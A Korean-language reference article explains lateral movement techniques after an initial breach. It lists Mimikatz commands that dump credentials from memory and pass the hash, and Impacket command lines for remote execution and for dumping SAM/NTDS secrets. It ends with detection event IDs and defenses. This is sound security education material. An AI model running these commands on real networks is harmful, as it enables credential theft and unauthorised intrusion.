횡적 이동(Lateral Movement)은 공격자가 초기 침투 후 내부 네트워크를 통해 다른 시스템으로 이동해 공격 범위를 확장하는 기술이다.
횡적 이동 기법 분류
| 기법 | 설명 | 사용 도구 |
|---|
| Pass-the-Hash | NTLM 해시 재사용 | Mimikatz, PsExec |
| Pass-the-Ticket | Kerberos 티켓 재사용 | Rubeus, Impacket |
| Golden Ticket | KRBTGT 해시로 티켓 위조 | Mimikatz |
| Over-Pass-Hash | 해시로 Kerberos 인증 | Impacket |
| RDP 세션 하이재킹 | 활성 RDP 세션 탈취 | tscon.exe |
| WMI/PSExec | 원격 코드 실행 | Impacket, wmiexec |
Mimikatz 자격증명 덤프
powershell
# 메모리에서 NTLM 해시 추출 (교육 목적)
# privilege::debug
# sekurlsa::logonpasswords
# Pass-the-Hash (PtH)
# sekurlsa::pth /user:admin /domain:corp.local # /ntlm:aad3b435b51404eeaad3b435b51404ee /run:cmd.exe
Impacket을 이용한 이동
bash
# psexec.py (SMB 원격 실행)
python psexec.py DOMAIN/user:password@192.168.1.10
# wmiexec.py (WMI 원격 실행 - 파일 생성 없음)
python wmiexec.py -hashes :NTLM_HASH DOMAIN/user@192.168.1.10
# smbexec.py (서비스 생성 방식)
python smbexec.py DOMAIN/user@192.168.1.10
# secretsdump.py (원격 SAM/NTDS 덤프)
python secretsdump.py DOMAIN/admin:pass@DC_IP
탐지 및 방어
탐지 지표:
- 비정상 SMB 연결 (내부 망)
- LSASS 프로세스 접근 이벤트 (이벤트 ID 4663)
- Kerberos 비정상 티켓 요청 (이벤트 ID 4768, 4769)
- WMI 원격 실행 이벤트 (이벤트 ID 4688)
방어:
- 마이크로세그멘테이션 (East-West 트래픽 제한)
- Local Administrator Password Solution (LAPS)
- Credential Guard (LSASS 메모리 보호)
- 네트워크 레벨 인증 (NLA) for RDP
- Pass-the-Hash 탐지 도구 (ATA, MDI)
관련 문서
